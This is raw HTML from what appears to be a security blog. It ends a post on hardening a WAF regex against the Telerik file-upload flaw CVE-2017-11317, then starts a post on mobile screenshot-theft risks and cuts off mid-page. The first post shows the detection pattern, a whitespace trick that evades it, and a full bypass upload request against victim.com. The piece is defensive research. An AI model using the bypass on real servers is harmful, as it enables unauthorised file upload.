inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">In particular, the focus was placed on blocking all the requests with the "<i>rauPostData</i>" parameter, containing file upload encrypted metadata, within the URL query string or the request body.</span></p><p cid="n160" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The check within the body of the request was performed using the following regular expression, after normalizing and transforming to lower case its content:</span></p><pre cid="n171" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">.*name=.?.?raupostdata.*</span></pre><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"></span></p><p cid="n152" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This rule blocked a request if performed using the regular syntax to insert a "<u><i>multipart/form-data</i></u>" parameter. </span></p><p cid="n152" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The image below shows how a regular parameter matches the regular expression. </span></p><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gSJXB-0XvRs/X6fbDtA_XRI/AAAAAAAAAAg/KNihf91Jx6gJK0S0ABLFQZLfVmlm0doqgCLcBGAsYHQ/s1113/regexmatch.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="344" data-original-width="1113" height="179" src="https://1.bp.blogspot.com/-gSJXB-0XvRs/X6fbDtA_XRI/AAAAAAAAAAg/KNihf91Jx6gJK0S0ABLFQZLfVmlm0doqgCLcBGAsYHQ/w577-h179/regexmatch.png" width="577" /></a></div><span style="background-color: white;"><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span style="background-color: white;"><br /></span></p></span><p style="text-align: left;"><span style="background-color: white; font-family: times; font-size: medium;">However, the regular expression check can be bypassed. The weakness of this check relies on the central portion of the expression that checks for a maximum of two characters <i>(".?.?")</i> between "<i>name="</i> and "<i>raupostdata</i>". If three spaces are added between the strings and the quotes are removed the expression will no longer match as shown below.</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vb5LVz2YYwQ/X6fbN02N_AI/AAAAAAAAAAk/VyQsmqa-l_0arf4ohI5LQviVraQ4Z1lowCLcBGAsYHQ/s1574/regexfail.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="1574" height="161" src="https://1.bp.blogspot.com/-vb5LVz2YYwQ/X6fbN02N_AI/AAAAAAAAAAk/VyQsmqa-l_0arf4ohI5LQviVraQ4Z1lowCLcBGAsYHQ/w573-h161/regexfail.png" width="573" /></a></div><br /><p></p><p cid="n106" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">With this modification the parameter was still considered valid by the web server allowing once again the file upload.</span></p><p cid="n107" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Request:</span></p><pre cid="n108" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;">/Weblink/Telerik.Web.UI.WebResource.axd</span> <span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">User-Agent:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Mozilla/5.0 (X11; Ubuntu; Linux x86_st64; rv:75.0) Gecko/20100101 Firefox/75.0</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> */*</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Language:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> en-US,en;q=0.5</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 2473</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span style="background-color: #f8f8f8;">Content-Disposition: form-data; </span><span style="background-color: #fcff01;">name= rauPostData</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">ATTu5i4R+ViNFYO[Encrypted rauPostData Payload in base64]9TB0pfAmUFAlzLUg==</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Test_Test</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="fileName"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="type"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">rau</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="metadata"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_12421498329494.txt"}</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f--</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><p cid="n109" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n110" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n111" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Tue, 19 May 2020 14:26:16 GMT</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 666</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":18,"DateJson":"2019-01-02T03:04:05.067Z","Index":0},"metaData":"[Base64 Metadata]" }</span></pre><p cid="n112" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n113" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Finally, the regular expression was changed to prevent also this last bypass:</span></p><pre cid="n114" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">.*name=.*raupostdata.*</span></pre><p cid="n115" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">With this rule, no matter how many characters are inserted between the strings, the request will still be blocked.</span></p><p cid="n116" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><h4 cid="n117" class="md-end-block md-heading" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Conclusions</span></h4><p cid="n118" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This article has shown the process used to tune the web application firewall rule while studying the exploit of the Telerik Unrestricted File Upload (</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2017-11317</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) vulnerability. </span></p><p cid="n118" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">It demonstrates how a vulnerability, that appears trivial to fix, requires an accurate analysis to develop a valid WAF rule.</span></p><p cid="n119" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The several failed rule attempts underline the importance of the following factors when developing a WAF rule:</span></p><ul cid="n120" class="ul-list" data-mark="-" mdtype="list" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 0.8em 0px; padding-left: 30px; position: relative;"><li cid="n121" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n122" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Avoid the implementation of coarse rules that impair the usability of an asset</span></p></li><li cid="n123" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n124" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Always perform normalization and lower case transformation of the textual parameters to check</span></p></li><li cid="n125" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n126" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Be suspicious of very strict regular expressions</span></p></li></ul><p cid="n127" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Obviously, all the recommendations above can be reversed for a penetration tester. </span></p><p cid="n127" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b>Bottom line?</b> Always look for a bypass!</span></p><p cid="n128" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><h4 cid="n129" class="md-end-block md-heading" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">References</span></h4><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"></span></p><ul cid="n130" class="ul-list" data-mark="-" mdtype="list" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 0.8em 0px 0px; padding-left: 30px; position: relative;"><li cid="n131" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n132" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;">https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html</a></span></p></li><li cid="n133" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n134" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;">https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui</a></span></p></li><li cid="n135" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n136" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;">https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload</a></span></p></li><li cid="n137" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n138" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://github.com/noperator/CVE-2019-18935" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;">https://github.com/noperator/CVE-2019-18935</a></span></p></li><li cid="n139" class="md-list-item md-focus-container" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n140" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s md-expand" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://github.com/bao7uo/RAU_crypto" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;">https://github.com/bao7uo/RAU_crypto</a></span></p></li></ul><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><br /></p></div></span></div></span></div>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-76561285386214730262020-10-15T09:53:00.014-07:002020-10-16T06:58:39.761-07:00Mobile Screenshot prevention Cheat Sheet - Risks and Scenarios<div><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><h1 style="line-height: 1.38; margin-bottom: 3pt; margin-top: 0pt; text-align: left;">Mobile Screenshot Prevention Cheat Sheet - Risks and Scenarios</h1><div>The following article will try to analyze and explain risks and attack scenarios affecting mobile applications without any implemented prevention mechanism against screenshotting.</div><div><br /></div><h2 style="text-align: left;">Briefly, what is the problem?</h2><div><div>Extremely summarizing, mobile applications need to implement screenshot prevention mechanisms in order to avoid an attacker to steal sensitive data, such as credentials or private information, that are shown on the screen during the application execution.</div><div><br /></div><div>The attacker could act by directly accessing the victim’s device, generating a screenshot using the device specific combo keys and then he would be able to send the generated screenshot to himself over the network. This kind of attack does not need any specific privilege or compromised device capability in order to get exploited. Just physical access to the device.</div><div><br /></div><div>On the other hand, the attacker could act by using a malware delivered on the victim’s device in some successful way, such as an untrusted application that may be downloaded from an unofficial store or that can be sent directly to the victim. As soon as the victim’s device gets infected, the attacker is now able to access private data and, based on the privileges acquirable on the infected device, he would be able to generate screenshots and/or access system generated screenshots which are stored on the device and may contain useful information to carry on further attacks.</div></div><div><br /></div><div><h2 style="text-align: left;">Attack Scenarios</h2><div>Basically the following three attack scenarios can be used by an attacker in order to successfully exploit the vulnerability, based on which access level is achievable on the targeted device:</div><div><br /></div></div></span></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div><b>- The attacker has physical access to the targeted device</b>: let’s assume the victim left his device unlocked at his desktop with a running application which is showing sensitive information. In this scenario it would be possible for an attacker to generate a screenshot using the device specific combo keys sending it to its own device through the network. </div></div></span></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div> </div></div></span></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div><b>- The attacker has planted a background running malware on the targeted device</b>: let’s assume that the attacker has delivered a malicious application on the victim’s device by uploading a compromised application on the store or by getting the victim to download an application from an untrusted source and the target device has a compromised status that can allow the malware to have privileged access to system calls. In this scenario the attacker would be able to silently generate device screenshots that can be then sent to the attacker himself through the network, exfiltrating sensitive data. </div></div></span></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div> </div></div></span></div></blockquote><blockquote style="border: none; margin: 